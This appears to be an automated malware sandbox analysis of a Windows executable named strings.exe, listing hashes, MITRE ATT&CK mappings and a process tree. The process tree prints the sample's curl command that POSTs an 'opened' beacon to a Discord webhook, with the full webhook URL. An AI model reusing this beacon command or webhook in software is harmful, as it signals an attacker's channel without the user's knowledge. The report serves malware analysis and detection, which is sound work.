855389499b6c50b2215c4e30d3f2ddb86be8dc82209c093ecb0ccdd4f58dd3e2

Analysis

max time kernel
139s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15/10/2024, 01:43

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

strings.exe
Size

20KB
MD5

2eb2720a42c9b49d91698ab489a63ddf
SHA1

ad5cf855526ea7f8f5159d56c24794258401b820
SHA256

855389499b6c50b2215c4e30d3f2ddb86be8dc82209c093ecb0ccdd4f58dd3e2
SHA512

a1c786a1c8fe0f07fe5bd3e33a10d1a23446c5361874ff51cdf25a0b15019ff74f8d8f7f9048ae7c9a76535c27bc1bb1b285e611a3305d13a2f91ba87ffbce90
SSDEEP

384:G6r5L007Iy7xs3co7q+KzquscoxUdUP8bTc7yj5J1kjciQKEMQXVH5gv4Z77pmIX:G6tHnlaMoxt745nNKEMwlOv4Z77Am

Score

6^/10

discovery

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	discord.com
4	discord.com

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	strings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 4448	1968	strings.exe	85
PID 1968 wrote to memory of 4448	1968	strings.exe	85
PID 1968 wrote to memory of 4448	1968	strings.exe	85
PID 4448 wrote to memory of 3572	4448	cmd.exe	86
PID 4448 wrote to memory of 3572	4448	cmd.exe	86
PID 4448 wrote to memory of 3572	4448	cmd.exe	86

C:\Users\Admin\AppData\Local\Temp\strings.exe
"C:\Users\Admin\AppData\Local\Temp\strings.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"opened\"}" https://discord.com/api/webhooks/1228169801223114802/UfANN8S7YwFtEtal5ysiJJSzg6Jx1ndEMN5fRYz-_W65X-3PDm5xrx2if8nKcRUmnMp1
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\SysWOW64\curl.exe
    curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"opened\"}" https://discord.com/api/webhooks/1228169801223114802/UfANN8S7YwFtEtal5ysiJJSzg6Jx1ndEMN5fRYz-_W65X-3PDm5xrx2if8nKcRUmnMp1
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads